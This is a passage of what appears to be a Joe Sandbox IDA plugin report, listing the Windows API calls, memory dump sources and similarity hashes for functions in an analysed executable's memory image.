                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F024B0
                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00F987B1
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2294984445-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 201cc787c0d48024b2e0f509d7526ac8bd14488ce395e8c852ac428a28273e78
                                                                                                                                                                                                                                                                                        • Instruction ID: ec8c5176570c8b1099d72fcf8987607942b559c254b3024edba1267a856dc291
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 201cc787c0d48024b2e0f509d7526ac8bd14488ce395e8c852ac428a28273e78
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D21B5316102459FDF149FB8CC08A6A37A5EB863B4F35462AF926C21E0DE308842FB52
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00F236E9,00F23355), ref: 00F23700
                                                                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F2370E
                                                                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F23727
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00F236E9,00F23355), ref: 00F23779
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 7feded93b562ad2f225923c316fc70ca414298fdc7d80543bd14f72e99c9ddfe
                                                                                                                                                                                                                                                                                        • Instruction ID: d312115b955e02f21d49bc287841f02b5d0a637bd2ba23b99ce2d17b06e106cc
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7feded93b562ad2f225923c316fc70ca414298fdc7d80543bd14f72e99c9ddfe
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D01D4F7A5E3356EAA2427B8BDC6A6A3A94EB15771B20023AF510420F1EF5D4D027540
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00F24D53,00000000,?,?,00F268E2,?,?,00000000), ref: 00F330EB
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3311E
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F33146
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000), ref: 00F33153
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000), ref: 00F3315F
                                                                                                                                                                                                                                                                                        • _abort.LIBCMT ref: 00F33165
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a703a5ad54843a4aa9f65b4877c6dc1f5f573118017cf788ee67622222d08e12
                                                                                                                                                                                                                                                                                        • Instruction ID: 584aeacb5f09c046f869021ecb013b5089ed47edcef2fc60b0bd998cd66ffed3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a703a5ad54843a4aa9f65b4877c6dc1f5f573118017cf788ee67622222d08e12
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4EF0C836E0450527D262B735AD07F5E366A9FC1771F390425FA24D22E1EF288A027161
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F01F87
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01F2D: SelectObject.GDI32(?,00000000), ref: 00F01F96
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01F2D: BeginPath.GDI32(?), ref: 00F01FAD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01F2D: SelectObject.GDI32(?,00000000), ref: 00F01FD6
                                                                                                                                                                                                                                                                                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00F994AA
                                                                                                                                                                                                                                                                                        • LineTo.GDI32(?,00000003,00000000), ref: 00F994BE
                                                                                                                                                                                                                                                                                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00F994CC
                                                                                                                                                                                                                                                                                        • LineTo.GDI32(?,00000000,00000003), ref: 00F994DC
                                                                                                                                                                                                                                                                                        • EndPath.GDI32(?), ref: 00F994EC
                                                                                                                                                                                                                                                                                        • StrokePath.GDI32(?), ref: 00F994FC
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 43455801-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 0ee7fe50af9eb3edc54aa0a464d602548d95d226150d9ca782078208c3ea9cbe
                                                                                                                                                                                                                                                                                        • Instruction ID: 9a8731d0ed2d6aafe73e6e5ca32ac5052c243ad255e91c956ffdd317dafd35b3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ee7fe50af9eb3edc54aa0a464d602548d95d226150d9ca782078208c3ea9cbe
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D311C97600010DBFEF129F94DC89E9A7F6DEB08364F148016BA195A1B1C7719D56EBA0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 00F65B7C
                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F65B8D
                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F65B94
                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00F65B9C
                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F65BB3
                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00F65BC5
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1035833867-0
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F032AF
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00F032B7
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F032C2
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F032CD
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00F032D5
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00F032DD
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F6F447
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F6F45D
• GetWindowThreadProcessId.USER32(?,?), ref: 00F6F46C
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F6F47B
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F6F485
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F6F48C
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
APIs
• GetClientRect.USER32(?), ref: 00F434EF
• SendMessageW.USER32(?,00001328,00000000,?), ref: 00F43506
• GetWindowDC.USER32(?), ref: 00F43512
• GetPixel.GDI32(00000000,?,?), ref: 00F43521
• ReleaseDC.USER32(?,00000000), ref: 00F43533
• GetSysColor.USER32(00000005), ref: 00F4354D
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: ClientColorMessagePixelRectReleaseSendWindow
• String ID:
• API String ID: 272304278-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F621CC
                                                                                                                                                                                                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00F621D8
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00F621E1
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00F621E9
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00F621F2
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00F621F9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d58d62b5efe21ce0baa2b5d7562a51e599da2cfa3e202a6353305f369f8a89dc
                                                                                                                                                                                                                                                                                        • Instruction ID: 4a53bd7d98afa43f6ce05c2286a5f83b76e86146c415703e208b71c7badcc3f6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d58d62b5efe21ce0baa2b5d7562a51e599da2cfa3e202a6353305f369f8a89dc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1E01A77404109BFEB011FE1ED0DD0ABF39FF49322BA04222F22582074CB329460EB51
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F041EA: _wcslen.LIBCMT ref: 00F041EF
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F6CF99
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F6CFE0
                                                                                                                                                                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F6D047
                                                                                                                                                                                                                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F6D075
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: 0350daad5a1e9f08724870689f496b35ca68fe8d080c98451b87ea0eab3a1751
                                                                                                                                                                                                                                                                                        • Instruction ID: 8ecf2842767b8446faf743605ee3a8b348738a2f80cdc4acc61a55a94f3d9cde
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0350daad5a1e9f08724870689f496b35ca68fe8d080c98451b87ea0eab3a1751
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA51C072F04300ABD714AF28DC45B6BB7E9AF59324F080A2AF995D3191DB74C905B792
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00F8B903
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F041EA: _wcslen.LIBCMT ref: 00F041EF
                                                                                                                                                                                                                                                                                        • GetProcessId.KERNEL32(00000000), ref: 00F8B998
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F8B9C7
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                                        • String ID: <$@
                                                                                                                                                                                                                                                                                        • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                                        • Opcode ID: c3e5fc7e9ce64560178ff3c2f2298391c5fb598814eed4f364313df8ecc46c25
                                                                                                                                                                                                                                                                                        • Instruction ID: 95f32d8104d4f7adb89dc8b06749324ab6e7512a545a7f904e71f9d4366fd9d6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3e5fc7e9ce64560178ff3c2f2298391c5fb598814eed4f364313df8ecc46c25
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4717C75A00619DFCB10EF94C895A9EBBF5FF08310F048499E855AB392CB74ED46EB90
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F67B6D
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F67BA3
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F67BB4
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F67C36
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                                        • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                                        • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                                        • Opcode ID: 875b37ab8ee11193eaf6be2ef4dba62617f6d0e13a79fe237d4920c3a577f551
                                                                                                                                                                                                                                                                                        • Instruction ID: c867678ba8b6fc83291e2fceb64f05350df5ab02c5fdb890e816d5988d457758
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 875b37ab8ee11193eaf6be2ef4dba62617f6d0e13a79fe237d4920c3a577f551
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A341C3B1604304DFDB15EF24D984B9A7BB9EF44318F1080ADA805DF24AD7B1DD44EBA0
APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F948D1
• IsMenu.USER32(?), ref: 00F948E6
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F9492E
• DrawMenuBar.USER32 ref: 00F94941
Strings
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert
• String ID: 0
• API String ID: 3076010158-4108050209
APIs
  • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
  • Part of subcall function 00F645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F64620
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F627B3
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F627C6
• SendMessageW.USER32(?,00000189,?,00000000), ref: 00F627F6
  • Part of subcall function 00F08577: _wcslen.LIBCMT ref: 00F0858A
Strings
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: MessageSend$_wcslen$ClassName
• String ID: ComboBox$ListBox
• API String ID: 2081771294-1403004172
APIs
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F93A29
• LoadLibraryW.KERNEL32(?), ref: 00F93A30
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F93A45
• DestroyWindow.USER32(?), ref: 00F93A4D
Strings
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: MessageSend$DestroyLibraryLoadWindow
• String ID: SysAnimate32
• API String ID: 3529120543-1011021900
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F2508E,?,?,00F2502E,?,00FC98D8,0000000C,00F25185,?,00000002), ref: 00F250FD
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F25110
• FreeLibrary.KERNEL32(00000000,?,?,?,00F2508E,?,?,00F2502E,?,00FC98D8,0000000C,00F25185,?,00000002,00000000), ref: 00F25133
Strings
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F45657,?,?,00F062FA,?,00000001,?,?,00000000), ref: 00F06610
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F06622
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00F45657,?,?,00F062FA,?,00000001,?,?,00000000), ref: 00F06635
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                                        APIs
